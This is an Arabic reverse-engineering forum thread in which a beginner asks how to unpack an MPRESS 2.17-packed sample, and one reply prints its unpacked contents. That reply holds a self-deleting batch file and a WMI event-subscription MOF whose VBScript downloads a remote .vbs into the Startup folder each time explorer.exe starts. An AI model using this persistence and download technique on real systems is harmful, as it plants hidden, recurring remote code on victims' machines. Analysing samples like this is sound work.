الفريق العربي للهندسة العكسية

الفريق العربي للهندسة العكسية > منتديات الهندسة العكسية - Reverse Engineering Forums > الأسئلة والإستفسارات، حلول المشاكل و تبادل الخبرات - Expert Exchange Newbie Questions Answers > مساعدة حول حماية MPRESS 2.17
نسخة كاملة : مساعدة حول حماية MPRESS 2.17
أنت حالياً تتصفح نسخة خفيفة من المنتدى . مشاهدة نسخة كاملة مع جميع الأشكال الجمالية .

abu_youssef

11-02-2022, 08:26 AM
السلام عليكم
جمعه طيبة على الجميع
اخواني انا مبتدئ في الهندسة العكسية فا احتاج الي خبرتكم ومساعدة حول فك ضغط MPRESS  2.17
https://imgur.com/a/DJ54yFa
استخدمت de4dot بكل اصداراته ولم استطع فك الحماية 
ماهي الادوات المطلوبه لفك الحماية

H@wk0

11-02-2022, 06:30 PM
جرب هذه الأداة MPress Unpacker

abu_youssef

11-02-2022, 08:08 PM
للاسف لم تنجح الطريقه .. 
بحاول اني اسوي تفريغ للملف عن طريق megadumper لكن اواجه مشكله ان الملف يشتغل ثم يغلق نفسه ع طول ويوجد ملفات تنزل بعد التشغيل

TeRcO

12-02-2022, 03:09 PM
(11-02-2022, 08:26 AM)abu_youssef كتب : [ -> ]احتاج الي خبرتكم ومساعدة حول فك ضغط MPRESS  2.17
ممكن رابط البرنامج للمحاولة

abu_youssef

12-02-2022, 06:49 PM
البرنامج يوجد داخله ملف Batch و ملف JPG طبعا داخل الصورة اكواد برمجة و ملف BAT لتشغيل الاكواد من داخل الصورة
وهذا الرابط
https://www.mediafire.com/file/jp0biwfc7...r.zip/file

ملاحظه اذا شغلت الملف لابد يكون عندك برنامج Autoruns
https://imgur.com/a/PbvCHV2
كما فالصوره تقوم بحذفه ويمكنك الضغط عليه مرتين لمشاهده الملف
والملف الي ينزل MSgBox بصيغه vbs
الهدف هو الكسر فقط

abu_youssef

21-02-2022, 09:03 AM
[b]TeRcO[/b]

هل جربت فكها؟

Ajust

07-03-2022, 09:32 AM
اعتقد هذا الاصدار لن تستطيع كسره حتي ولو ثبت ويندوز xp

TeRcO

12-03-2022, 10:18 PM
(21-02-2022, 09:03 AM)abu_youssef كتب : [ -> ]هل جربت فكها؟

R.bat
set mypath=%cd%
set tcp = %tcp%
mofcomp tcp.png
del %mypath%\tcp.png
del %mypath%\R.bat
exit



TCP.png
#pragma AUTORECOVER
#pragma namespace ("\\\\.\\root\\subscription")

instance of ActiveScriptEventConsumer as $Cons
{
    Name = "Microsoft";
    ScriptingEngine = "VBScript";
ScriptText = "Function test() \n"

"dim xHttp \n"
" Set xHttp = createobject(\"Microsoft.XMLHTTP\") \n"
"dim bStrm\n"
 "Set bStrm = createobject(\"Adodb.Stream\") \n"
"xHttp.Open \"GET\", \"https://boostcp.000webhostapp.com/msgbox.vbs\", False \n"
"xHttp.Send \n"
"with bStrm \n"
    ".type = 1 \n"
 ".open \n"
    ".write xHttp.responseBody \n"
  ".savetofile \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updata.vbs\", 2 \n"

"end with \n"
"end function \n"
"test\n";
        
};

instance of __EventFilter as $Filt
{
    Name = "EF";
    EventNamespace = "root\\cimv2";
    QueryLanguage = "WQL";
    Query = "SELECT * FROM __InstanceCreationEvent "  
            "WITHIN 1 WHERE TargetInstance ISA 'Win32_Process' "
            "AND TargetInstance.Name = 'explorer.exe'";
};

instance of __FilterToConsumerBinding
{
    Filter = $Filt;
    Consumer = $Cons;
}; 


msgbox
Link:
https://boostcp.000webhostapp.com/msgbox.vbs
Message:msgbox"Risk"
 
(11-02-2022, 08:26 AM)abu_youssef كتب : [ -> ]استخدمت de4dot بكل اصداراته ولم استطع فك الحماية 
لاينفع لان البرنامج ليس مبرمج ب:  c# / .Net

 
(11-02-2022, 08:26 AM)abu_youssef كتب : [ -> ]ماهي الادوات المطلوبه لفك الحماية
ollydbg
لايجاد نقطة الدخول الاصلية OEP
imprec import reconstructor
dump +  إصلاح جدول الدوال المستوردة IAT
الفريق العربي للهندسة العكسية > منتديات الهندسة العكسية - Reverse Engineering Forums > الأسئلة والإستفسارات، حلول المشاكل و تبادل الخبرات - Expert Exchange Newbie Questions Answers > مساعدة حول حماية MPRESS 2.17